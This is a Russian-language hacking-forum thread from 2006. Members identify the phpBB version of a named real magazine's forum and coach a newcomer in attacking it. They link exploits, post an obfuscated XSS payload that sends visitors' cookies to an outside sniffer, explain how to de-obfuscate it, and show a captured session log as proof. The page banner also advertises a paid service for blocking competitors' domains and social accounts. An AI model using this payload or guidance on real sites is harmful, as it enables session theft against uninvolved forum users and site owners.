Форум АНТИЧАТ - Подскажите версию phpBB http://www.onboardmagazine.ru/forum/

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
Подскажите версию phpBB http://www.onboardmagazine.ru/forum/

Опции темы

Поиск в этой теме

Опции просмотра

Подскажите версию phpBB http://www.onboardmagazine.ru/forum/

28.10.2006, 12:17

Fa1nt

Новичок

Регистрация: 14.10.2006

Сообщений: 2

Провел на форуме:
7543

Репутация: 0

Отправить сообщение для Fa1nt с помощью ICQ

Подскажите версию phpBB http://www.onboardmagazine.ru/forum/

Хотел спросить какая это весия phpBB?
http://www.onboardmagazine.ru/forum/
И если под эту версию эксплоит?Заранее всем спасибо

28.10.2006, 12:19

Koller

Постоянный

Регистрация: 25.07.2005

Сообщений: 471

Провел на форуме:
3465924

Репутация: 931

Предположу, что версия 2.0.19
А так, читай этот топ - http://forum.antichat.ru/thread18918.html
Потом, как определишь примерную версию лезишь сюда - http://forum.antichat.ru/thread12610.html
И будет тебе счастье...

28.10.2006, 12:32

Fa1nt

Новичок

Регистрация: 14.10.2006

Сообщений: 2

Провел на форуме:
7543

Репутация: 0

А highlight баг случайно не в версии 2.0.19?

28.10.2006, 12:42

Koller

Постоянный

Регистрация: 25.07.2005

Сообщений: 471

Провел на форуме:
3465924

Репутация: 931

Вот тебе сплойты под версию 2.0.19

_http://milw0rm.com/exploits/1457
_http://milw0rm.com/exploits/1469
_http://milw0rm.com/exploits/1661

Также глянь тут

28.10.2006, 13:02

_-[A.M.D]HiM@S-_

Green member

Регистрация: 28.12.2005

Сообщений: 376

Провел на форуме:
5559831

Репутация: 1833

Версия этого форума 2.0.18
В это версии есть XSS

PHP код:


		
			
[UR*L]http://www.[U*RL=http://wj.com/style=display:none;background&+#58;&+#117;&+#114;&+#108;&+#40;&+#106;&+#97;&+#118;&+#97;&+#115;&+#99;&+#114;&+#105;&+#112;&+#116;&+#58;&+#100;&+#111;&+#99;&+#117;&+#109;&+#101;&+#110;&+#116;&+#46;&+#105;&+#109;&+#97;&+#103;&+#101;&+#115;&+#91;&+#49;&+#93;&+#46;&+#115;&+#114;&+#99;&+#61;&+#34;&+#104;&+#116;&+#116;&+#112;&+#58;&+#47;&+#47;&+#97;&+#110;&+#116;&+#105;&+#99;&+#104;&+#97;&+#116;&+#46;&+#114;&+#117;&+#47;&+#99;&+#103;&+#105;&+#45;&+#98;&+#105;&+#110;&+#47;&+#115;&+#46;&+#106;&+#112;&+#103;&+#63;&+#34;+document.cookie;&+#41;&+#32;]wj[/*URL][/*URL]

Что бы воспользоваться сплойтом убираем плюсы между символами & и #(например было "&+#40" стало -"&#40")

Потом иди на снифер античата и лови куки

28.10.2006, 13:08

Koller

Постоянный

Регистрация: 25.07.2005

Сообщений: 471

Провел на форуме:
3465924

Репутация: 931

Коллега, Вы правы )
Проверил эту xss, работает, значит версия не выше 2.0.18...
Так что дерзай, автор топика...

28.10.2006, 15:11

IOBOWAN

Новичок

Регистрация: 15.09.2006

Сообщений: 27

Провел на форуме:
52210

Репутация: 2

чтото у меня хсска не прокатила((
p.s плюсы убрал
мож что еще надо сделать???

28.10.2006, 15:16

Koller

Постоянный

Регистрация: 25.07.2005

Сообщений: 471

Провел на форуме:
3465924

Репутация: 931

Цитата:

Сообщение от IOBOWAN

чтото у меня хсска не прокатила((
p.s плюсы убрал
мож что еще надо сделать???

Все работает...еще раз только что проверил...
Вводишь с тексте сообщения

Код:

[UR*L]http://www.[U*RL=http://wj.com/style=display:none;background&+#58;&+#117;&+#114;&+#108;&+#40;&+#106;&+#97;&+#118;&+#97;&+#115;&+#99;&+#114;&+#105;&+#112;&+#116;&+#58;&+#100;&+#111;&+#99;&+#117;&+#109;&+#101;&+#110;&+#116;&+#46;&+#105;&+#109;&+#97;&+#103;&+#101;&+#115;&+#91;&+#49;&+#93;&+#46;&+#115;&+#114;&+#99;&+#61;&+#34;&+#104;&+#116;&+#116;&+#112;&+#58;&+#47;&+#47;&+#97;&+#110;&+#116;&+#105;&+#99;&+#104;&+#97;&+#116;&+#46;&+#114;&+#117;&+#47;&+#99;&+#103;&+#105;&+#45;&+#98;&+#105;&+#110;&+#47;&+#115;&+#46;&+#106;&+#112;&+#103;&+#63;&+#34;+document.cookie;&+#41;&+#32;]wj[/*URL][/*URL]

Не забываем убирать плюсы и звездочки...
Заходишь сюда затем - http://antichat.ru/sniff/log.php
Как доказательство того, что работает:

Цитата:

[Sat Oct 28 15:12:47 2006] IP=83.237.**.*** SITE=www.onboardmagazine.ru
REFERER=http://www.onboardmagazine.ru/forum/posting.php
QUERY=phpbb2mysql_data=a:2:{s:11:"autologinid";s:0 :"";s:6:"userid";i:-1;}; phpbb2mysql_sid=56b611340396fa83c6aa7ef95c10aaff; phpbb2mysql_data=a:2:{s:11:"autologinid";s:0:"";s: 6:"userid";i:-1;}
AGENT=Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)

Если опять не получится стучи в асю...помогу...
Ах да...забыл еще сказать...наврядли у тебя получится заполучить куки админа потому как наврядли он вовсе свой форум посещает...
Форум запустили...там рекламы больше чем обычных постов...

Последний раз редактировалось Koller; 28.10.2006 в 15:21..

28.10.2006, 15:36

IOBOWAN

Новичок

Регистрация: 15.09.2006

Сообщений: 27

Провел на форуме:
52210

Репутация: 2

ооо всё прокатило.
оказывается надобыло через експлорер зайти..
а через оперу не катит

#10

28.10.2006, 16:15

~~guest3297~~

Banned

Регистрация: 27.06.2006

Сообщений: 1,614

Провел на форуме:
3887520

Репутация: 2996

_http://www.onboardmagazine.ru/forum/docs/INSTALL.html

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Подскажите уязвимости phpBB на PHPNuke	L1on	Форумы	8	23.05.2006 05:19
Подскажите версию форума	Gho_st	Форумы	10	20.02.2006 20:10
Подскажите Proxy	$ZLO$	Болталка	3	06.02.2005 14:29

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход